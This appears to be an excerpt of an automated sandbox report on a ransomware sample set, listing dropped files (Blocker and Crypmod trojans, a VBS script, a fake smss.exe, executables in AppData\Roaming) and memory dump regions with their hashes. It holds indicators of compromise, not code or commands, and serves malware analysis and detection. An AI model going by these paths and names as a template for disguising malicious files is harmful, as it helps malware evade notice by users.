SHA512 fcbf14e516e5f59a3161ba682826649c5bfb1cb7b0b8a957fa8017d3974d2d456ab74359dce138c8366f24194780dd424d6453a9a59e926e99bd188408f3facf

memory/4384-723-0x0000000000BE0000-0x0000000000C16000-memory.dmp

memory/4812-721-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1896-726-0x0000000004E70000-0x0000000004F0C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe

MD5 53b1e433b66ed04ab1204e8b3a9e9785
SHA1 29c5e98ab1e93e118757c174eec0f7fedc1651d7
SHA256 560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a
SHA512 c0b680d88cbdf8851ee9c43a6778cd9e279c76abb3bb88a7361c4d54ea0cb175e41ec12b7a4c587876365331da52387a6e191ca62bfce2934bdc4a7bffae738a

memory/1896-730-0x00000000054D0000-0x0000000005A74000-memory.dmp

memory/1896-725-0x00000000005C0000-0x00000000005D4000-memory.dmp

memory/1896-732-0x0000000004FC0000-0x0000000005052000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\zbhnd.exe

MD5 2256c5927fb57a2ffbb386da06ea2d0e
SHA1 15453757f75683ce8e5892f709c640bb99b6b055
SHA256 26e7d625b4b68d72ded4557ef17b06e72862f3e4a61a94fb1af184212ab775ec
SHA512 7a765ecf45a0870fc1129686c50e3572af2f464bbba68f70017528a4e9bdbb08473ca31a1d99bad516c0baf5c39bc97e2139a03570bc57d3b87e98c617ba77fe

memory/1896-740-0x0000000004F20000-0x0000000004F2A000-memory.dmp

memory/1896-741-0x0000000005150000-0x00000000051A6000-memory.dmp

memory/4812-755-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2464-753-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe

MD5 7d945a6449b3c6005ad868c03fe95e76
SHA1 53b7e5e40e588b72e07a626f05b43bfc29edfe32
SHA256 86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe
SHA512 2a0d4dbdb108a30c6ba7fa48fb49dac85c753f2b78ff56d783a714ed59757b2e7c06d394d63a5fc7d1da4173eba5e04a9b061e37c439d78ee03dd27dfe0f29d3

C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\djfgkjdnbkjdfhooerkhjfjdlfkgdf.vbs

MD5 3d01ee4659d80173c2e4d6ad05922d60
SHA1 982aaa71f725128aa73669c2869feff391797565
SHA256 121f3478b61beff37c8a3f64f55ddbef4d2b8097f1c013d9a3ceb709bdc526c2
SHA512 b1d5a857f0aee8bd73095c714372ad4d7786d7ad4348275bae603a2e2644b87e3e4b2f0930d82b5cabcef59f92c93b940a29053a8dad4104509149e034c8fae1

C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\Setup.exe

MD5 87213006cba133fd2f5556cab1b702a9
SHA1 f5ac580bdd63a4c3770602dd05f35ab1ac215191
SHA256 504cdfbb04059dc8553c56d17f114f8b3e5f6ac050cab99de199b73e9f5c9608
SHA512 1813b9d6d281bd467bbb11b2bb44da87389d873d6cccbe1af0dd242c21db9179c98ddb90f85c95587d367da1f5f049f9644abd4d0ae3dbf8af7387c75e2fa4c1

C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe

MD5 3e0008cc2c154ed7421566bfbcef4c1b
SHA1 d9541802d6743d8297e35df54b1e96dd0f0d798e
SHA256 c8c5d40c561da8cd603ef7efbca59fc0a7c8463032469315d2d06d0cf01a3099
SHA512 43008875d176fe858f698d0d934a81cef02d5c7313bd1652ec6566892f1ed505668643119deab28186ef5bebabf9f95fb421443959a1157e6f9d68a9bfec789e

memory/1192-771-0x0000000000400000-0x000000000042D000-memory.dmp

memory/3540-782-0x0000000000BB0000-0x0000000000BB6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-2L84U.tmp\Setup.tmp

MD5 ae9890548f2fcab56a4e9ae446f55b3f
SHA1 e17c970eebbe6d7d693c8ac5a7733218800a5a96
SHA256 09af8004b85478e1eca09fa4cb5e3081dddcb2f68a353f3ef6849d92be47b449
SHA512 154b6f66ff47db48ec0788b8e67e71f005b51434920d5d921ac2a5c75745576b9b960e2e53c6a711f90f110ad2372ef63045d2a838bc302367369ef1731c80eb

C:\Users\Admin\AppData\Local\Temp\is-SR0GO.tmp\idp.dll

MD5 af555ac9c073f88fe5bf0d677f085025
SHA1 5fff803cf273057c889538886f6992ea05dd146e
SHA256 f4fc0187491a9cb89e233197ff72c2405b5ec02e8b8ea640ee68d034ddbc44bb
SHA512 c61bf21a5b81806e61aae1968d39833791fd534fc7bd2c85887a5c0b2caedab023d94efdbbfed2190b087086d3fd7b98f2737a65f4536ab603dec67c9a8989f5

memory/4832-799-0x0000000002A50000-0x0000000002A65000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-SR0GO.tmp\innocallback.dll

MD5 1c55ae5ef9980e3b1028447da6105c75
SHA1 f85218e10e6aa23b2f5a3ed512895b437e41b45c
SHA256 6afa2d104be6efe3d9a2ab96dbb75db31565dad64dd0b791e402ecc25529809f
SHA512 1ec4d52f49747b29cfd83e1a75fc6ae4101add68ada0b9add5770c10be6dffb004bb47d0854d50871ed8d77acf67d4e0445e97f0548a95c182e83b94ddf2eb6b

memory/4832-806-0x0000000002A70000-0x0000000002AD5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-SR0GO.tmp\ISDone.dll

MD5 63dc27b7bc65243efaa59a9797a140ba
SHA1 22f893aefcebecc9376e2122a3321befa22cdd73
SHA256 c652b4b564b3c85c399155cbb45c6fb5a9f56f074e566bfd20f01da6e0412c74
SHA512 3df72dc171baa4698dfd0c324a96dde79eb1c8909f2ff7d8da40e5ca1de08f1fc26298139ab618e0bb3fa168efe5d6059398b90d8ff5f88e54c7988c21fb679e

C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Crypmod.gen-a65a6ccefe88fd5e5b4bda67f727faf3a050f9a8cbfc9d1cc74d23da48f81af9.exe

MD5 f399421a32a0f651204705875433593b
SHA1 797aedbb2a3f2cd6d47dbe13745a18ade25b106f
SHA256 a65a6ccefe88fd5e5b4bda67f727faf3a050f9a8cbfc9d1cc74d23da48f81af9
SHA512 b98a3923f3e78b036e58ae60e9810705f3984a355e33f54468cd275f61beb89a6fc0849513bb75be77fb16411c5942189475c0342b69523384b411ce88ba6738

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 a26df49623eff12a70a93f649776dab7
SHA1 efb53bd0df3ac34bd119adf8788127ad57e53803
SHA256 4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512 e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

memory/1740-883-0x0000000000400000-0x0000000000601000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 223bd4ae02766ddc32e6145fd1a29301
SHA1 900cfd6526d7e33fb4039a1cc2790ea049bc2c5b
SHA256 1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e
SHA512 648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9df2c1b0198535f473a4eed1af0069f4
SHA1 8c2fa1ad91aeaec82a682912e41af53dd5a2a534
SHA256 129e758d070f480bcb621c745a0b7679b42b16c3f890073ea4b609ad4e139d9f
SHA512 0695a4a9fb9ecd21701acc0a5166fca3678c41ac91f682f8db06260cac4b788bb7c7cff3b0c136ccc7479a3ddd564a7bd0011d04e070c1503b52f4d5ec599cfc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b4083d710d2193dcade0f9f54b468fe3
SHA1 4cbabe5d9fdb1bb484eb5243713e4fbc867cb76f
SHA256 6b49a4fe44eebc86e665dda590c6fd38c71f1cb944c7f4ee40b95aaf93203e12
SHA512 dda9b47ffc3fb9d436aed1dc8de0bd318b6c74ee3800cc68ce3d4c7f797ae5d1033c9ee5d048f3eba7b716cb274ead24dcde6a2ce038eabfd57c06a3466e745b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 de42a396defd3e76a5f83443b974aa8f
SHA1 b3f14b579f3bd67ebe8e45088ce3e41e98ae39b3
SHA256 1dd3226b5a1377ee56b09ee4144c9ce460156fe96e06f603b9baf3f55cebb2be
SHA512 5738a7b7e9821c459510eb2f734f93cc06a6a9a3a02d1da363bde1c32990ec7824c43c176a39958dc17c89e0b1940dda5a3e5cb00ab4e4a6ce421d30ca03796b

memory/2464-897-0x0000000000400000-0x0000000000409000-memory.dmp

memory/768-898-0x0000000000400000-0x0000000000601000-memory.dmp

memory/4776-900-0x0000000000400000-0x0000000000601000-memory.dmp

memory/1192-899-0x0000000000400000-0x000000000042D000-memory.dmp

memory/4832-902-0x0000000002A50000-0x0000000002A65000-memory.dmp

memory/4832-903-0x0000000002A70000-0x0000000002AD5000-memory.dmp

memory/4832-901-0x0000000000400000-0x0000000000579000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6a210b55aded73b2248fc6befecf97ac
SHA1 116740a92b20a51523d34f58ee4073557f15a2fa
SHA256 50b88de1425817b6d8b443056b45039c874f31624deef02fd74f91668dde808f
SHA512 f5b6746e98242c40cd9252143e1050c06cebf891d7cf76772da9c49002607afdd979b9f26399698cc46b706e7f2891a4f228a6459bea9ed09610bbde4a73620c

memory/1740-906-0x0000000000400000-0x0000000000601000-memory.dmp

memory/768-908-0x0000000000400000-0x0000000000601000-memory.dmp

memory/4776-910-0x0000000000400000-0x0000000000601000-memory.dmp

C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe

MD5 59bf24d11e5a6bf125a613687c9d1e0a
SHA1 d13e17a1991586600d55ea3d0dcc38dca1af016f
SHA256 20c5c3f37310eaae6b8d188b24ebbb90f3b7af664a7b1663e23b8c3c193c768b
SHA512 18360ab4a57c16e818c339c75d125fa449441f950b98e4ace1f76b96474310afb9ff21261e1548f0123f0985ebc540b85a001131e944e5f8f1362b31f19366b5

C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe

MD5 d56af668d37ed2dc777a62a08d311c83
SHA1 07214e4dd31d51a5b2d39d967323d9aef2bc53ee
SHA256 e7a1fdc34a553dd80d198d4939b8575ed0f5a7dff47f755b46fc6e18cee5138e
SHA512 ef14dfb590a448d367ffec27b42ae23cf90b6c6d4f0d4d0c99f9a764469261c2f01331b3246e98b309be6f0ade7086767924cb0e353afb05b0b14ff8e8dcf9b4

C:\Users\Admin\AppData\Roaming\Scegli_nome_allegato.exe

MD5 5ca5d3c4b8fdea4b0b751fc6078e217d
SHA1 920324b18bc5e31ee75d13ffdfd869dcedbdcfed
SHA256 7ab6749cceb79016df35d612c17b33df4f2d25e8f1147bcc0273b0cfae71801f
SHA512 4b10ded7e7d41e368524ae29e831eb2cc19677a65edb5b1ce62e706ce10ca89425275236a442c14144fad69f598a436c533ba53342ce7ca106aab074995e9f87

C:\Users\Admin\AppData\Roaming\Scegli_nome_allegato.exe

MD5 ff312b356a09f7409e7d2ee92dee7029
SHA1 1dc61fd5d0ea3e5bc362e0bad0196980c44a796a
SHA256 92bba5ae211e3e384b00600f9b471f2f96b99ddd3526479b4f7d52959a105f33
SHA512 03c82e41d0200e4302833fd32644da78e202674fa268222ae6cec8c8fd6bce0ce6149c3639e80878aa46ecaedc8076c611c593b4d9373697b7b2c0fc7866e198

memory/1740-937-0x0000000000400000-0x0000000000601000-memory.dmp

memory/768-938-0x0000000000400000-0x0000000000601000-memory.dmp

C:\Users\Admin\AppData\Roaming\BD366504095.exe

MD5 e14f38980007ecd9077abe884b509cd1
SHA1 1206f13f9d56aed9625532f758897d90218002e1
SHA256 a0900c168a402c4eaa6143ef6e6b5a55be062434197985e28a30dfd3b0711d60
SHA512 ca6d59ac7cdfcb0026784efc6fddd2d0e2aecda098e1050edda78421d0c67a9080dff766ad480f95f5279db1c8e519c943b91554a13a1e01e1eae8e82099e440

C:\Users\Admin\AppData\Roaming\Scegli_nome_allegato.exe

MD5 a2f259ceb892d3b0d1d121997c8927e3
SHA1 6e0a7239822b8d365d690a314f231286355f6cc6
SHA256 ab01a333f38605cbcebd80e0a84ffae2803a9b4f6bebb1e9f773e949a87cb420
SHA512 5ae1b60390c94c9e79d3b500a55b775d82556e599963d533170b9f35ad5cfa2df1b7d24de1890acf8e1e2c356830396091d46632dbc6ee43a7d042d4facb5dad

memory/4776-959-0x0000000000400000-0x0000000000601000-memory.dmp

memory/4832-966-0x0000000002A70000-0x0000000002AD5000-memory.dmp

memory/5056-967-0x0000000000400000-0x0000000000601000-memory.dmp

memory/4832-965-0x0000000002A50000-0x0000000002A65000-memory.dmp

memory/4480-968-0x0000000000400000-0x0000000000601000-memory.dmp

memory/5092-969-0x0000000000400000-0x00000000004FB000-memory.dmp

memory/4828-983-0x0000000000400000-0x00000000004A6000-memory.dmp

memory/4828-986-0x0000000000400000-0x00000000004A6000-memory.dmp

memory/5056-985-0x0000000000400000-0x0000000000601000-memory.dmp

memory/4480-990-0x0000000000400000-0x0000000000601000-memory.dmp

memory/4480-994-0x0000000000400000-0x0000000000601000-memory.dmp

memory/4828-1003-0x0000000000400000-0x00000000004A6000-memory.dmp

memory/2492-1005-0x0000000000400000-0x00000000004A6000-memory.dmp

memory/4828-1011-0x0000000000400000-0x00000000004A6000-memory.dmp